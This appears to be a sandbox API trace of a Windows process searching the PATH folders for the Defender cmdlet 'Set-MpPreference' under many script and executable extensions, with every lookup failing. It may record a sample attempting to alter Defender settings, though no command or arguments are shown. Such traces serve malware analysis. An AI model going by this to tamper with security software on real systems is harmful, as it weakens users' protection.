	[0063.815] SetErrorMode (uMode=0x1) returned 0x1
	[0063.815] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.815] GetLastError () returned 0x2
	[0063.815] SetErrorMode (uMode=0x1) returned 0x1
	[0063.815] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.815] GetLastError () returned 0x2
	[0063.815] SetErrorMode (uMode=0x1) returned 0x1
	[0063.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.817] GetLastError () returned 0x2
	[0063.817] SetErrorMode (uMode=0x1) returned 0x1
	[0063.817] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.ps1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.817] GetLastError () returned 0x2
	[0063.817] SetErrorMode (uMode=0x1) returned 0x1
	[0063.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.817] GetLastError () returned 0x2
	[0063.817] SetErrorMode (uMode=0x1) returned 0x1
	[0063.817] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psm1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.818] GetLastError () returned 0x2
	[0063.818] SetErrorMode (uMode=0x1) returned 0x1
	[0063.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.818] GetLastError () returned 0x2
	[0063.818] SetErrorMode (uMode=0x1) returned 0x1
	[0063.818] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psd1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.818] GetLastError () returned 0x2
	[0063.818] SetErrorMode (uMode=0x1) returned 0x1
	[0063.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.818] GetLastError () returned 0x2
	[0063.818] SetErrorMode (uMode=0x1) returned 0x1
	[0063.818] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.COM", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.818] GetLastError () returned 0x2
	[0063.818] SetErrorMode (uMode=0x1) returned 0x1
	[0063.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.818] GetLastError () returned 0x2
	[0063.818] SetErrorMode (uMode=0x1) returned 0x1
	[0063.819] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.EXE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.819] GetLastError () returned 0x2
	[0063.819] SetErrorMode (uMode=0x1) returned 0x1
	[0063.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.819] GetLastError () returned 0x2
	[0063.819] SetErrorMode (uMode=0x1) returned 0x1
	[0063.819] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.BAT", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.819] GetLastError () returned 0x2
	[0063.819] SetErrorMode (uMode=0x1) returned 0x1
	[0063.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.819] GetLastError () returned 0x2
	[0063.819] SetErrorMode (uMode=0x1) returned 0x1
	[0063.819] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.CMD", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.819] GetLastError () returned 0x2
	[0063.820] SetErrorMode (uMode=0x1) returned 0x1
	[0063.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.820] GetLastError () returned 0x2
	[0063.820] SetErrorMode (uMode=0x1) returned 0x1
	[0063.820] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBS", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.820] GetLastError () returned 0x2
	[0063.820] SetErrorMode (uMode=0x1) returned 0x1
	[0063.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.820] GetLastError () returned 0x2
	[0063.820] SetErrorMode (uMode=0x1) returned 0x1
	[0063.820] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.820] GetLastError () returned 0x2
	[0063.820] SetErrorMode (uMode=0x1) returned 0x1
	[0063.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.820] GetLastError () returned 0x2
	[0063.820] SetErrorMode (uMode=0x1) returned 0x1
	[0063.821] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JS", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.821] GetLastError () returned 0x2
	[0063.821] SetErrorMode (uMode=0x1) returned 0x1
	[0063.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.821] GetLastError () returned 0x2
	[0063.821] SetErrorMode (uMode=0x1) returned 0x1
	[0063.821] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JSE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.821] GetLastError () returned 0x2
	[0063.821] SetErrorMode (uMode=0x1) returned 0x1
	[0063.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.821] GetLastError () returned 0x2
	[0063.821] SetErrorMode (uMode=0x1) returned 0x1
	[0063.821] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSF", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.821] GetLastError () returned 0x2
	[0063.822] SetErrorMode (uMode=0x1) returned 0x1
	[0063.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.822] GetLastError () returned 0x2
	[0063.822] SetErrorMode (uMode=0x1) returned 0x1
	[0063.822] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSH", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.822] GetLastError () returned 0x2
	[0063.822] SetErrorMode (uMode=0x1) returned 0x1
	[0063.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.822] GetLastError () returned 0x2
	[0063.822] SetErrorMode (uMode=0x1) returned 0x1
	[0063.822] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.MSC", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.822] GetLastError () returned 0x2
	[0063.822] SetErrorMode (uMode=0x1) returned 0x1
	[0063.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0063.822] GetLastError () returned 0x2
	[0063.822] SetErrorMode (uMode=0x1) returned 0x1
	[0063.822] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.823] GetLastError () returned 0x2
	[0063.823] SetErrorMode (uMode=0x1) returned 0x1
	[0063.823] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.823] GetLastError () returned 0x2
	[0063.823] SetErrorMode (uMode=0x1) returned 0x1
	[0063.823] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.ps1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.823] GetLastError () returned 0x2
	[0063.823] SetErrorMode (uMode=0x1) returned 0x1
	[0063.823] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.823] GetLastError () returned 0x2
	[0063.823] SetErrorMode (uMode=0x1) returned 0x1
	[0063.823] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psm1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.823] GetLastError () returned 0x2
	[0063.823] SetErrorMode (uMode=0x1) returned 0x1
	[0063.824] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.824] GetLastError () returned 0x2
	[0063.824] SetErrorMode (uMode=0x1) returned 0x1
	[0063.824] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psd1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.824] GetLastError () returned 0x2
	[0063.824] SetErrorMode (uMode=0x1) returned 0x1
	[0063.824] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.824] GetLastError () returned 0x2
	[0063.824] SetErrorMode (uMode=0x1) returned 0x1
	[0063.824] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.COM", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.824] GetLastError () returned 0x2
	[0063.824] SetErrorMode (uMode=0x1) returned 0x1
	[0063.824] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.824] GetLastError () returned 0x2
	[0063.824] SetErrorMode (uMode=0x1) returned 0x1
	[0063.824] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.EXE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.825] GetLastError () returned 0x2
	[0063.825] SetErrorMode (uMode=0x1) returned 0x1
	[0063.825] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.825] GetLastError () returned 0x2
	[0063.825] SetErrorMode (uMode=0x1) returned 0x1
	[0063.825] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.BAT", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.825] GetLastError () returned 0x2
	[0063.825] SetErrorMode (uMode=0x1) returned 0x1
	[0063.825] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.825] GetLastError () returned 0x2
	[0063.825] SetErrorMode (uMode=0x1) returned 0x1
	[0063.825] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.CMD", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.825] GetLastError () returned 0x2
	[0063.825] SetErrorMode (uMode=0x1) returned 0x1
	[0063.825] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.825] GetLastError () returned 0x2
	[0063.826] SetErrorMode (uMode=0x1) returned 0x1
	[0063.826] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBS", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.826] GetLastError () returned 0x2
	[0063.826] SetErrorMode (uMode=0x1) returned 0x1
	[0063.826] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.826] GetLastError () returned 0x2
	[0063.826] SetErrorMode (uMode=0x1) returned 0x1
	[0063.826] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.826] GetLastError () returned 0x2
	[0063.826] SetErrorMode (uMode=0x1) returned 0x1
	[0063.826] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.826] GetLastError () returned 0x2
	[0063.826] SetErrorMode (uMode=0x1) returned 0x1
	[0063.826] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JS", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.826] GetLastError () returned 0x2
	[0063.827] SetErrorMode (uMode=0x1) returned 0x1
	[0063.827] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.827] GetLastError () returned 0x2
	[0063.827] SetErrorMode (uMode=0x1) returned 0x1
	[0063.827] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JSE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.827] GetLastError () returned 0x2
	[0063.827] SetErrorMode (uMode=0x1) returned 0x1
	[0063.827] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.827] GetLastError () returned 0x2
	[0063.827] SetErrorMode (uMode=0x1) returned 0x1
	[0063.827] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSF", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.827] GetLastError () returned 0x2
	[0063.827] SetErrorMode (uMode=0x1) returned 0x1
	[0063.827] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.827] GetLastError () returned 0x2
	[0063.827] SetErrorMode (uMode=0x1) returned 0x1
	[0063.827] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSH", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
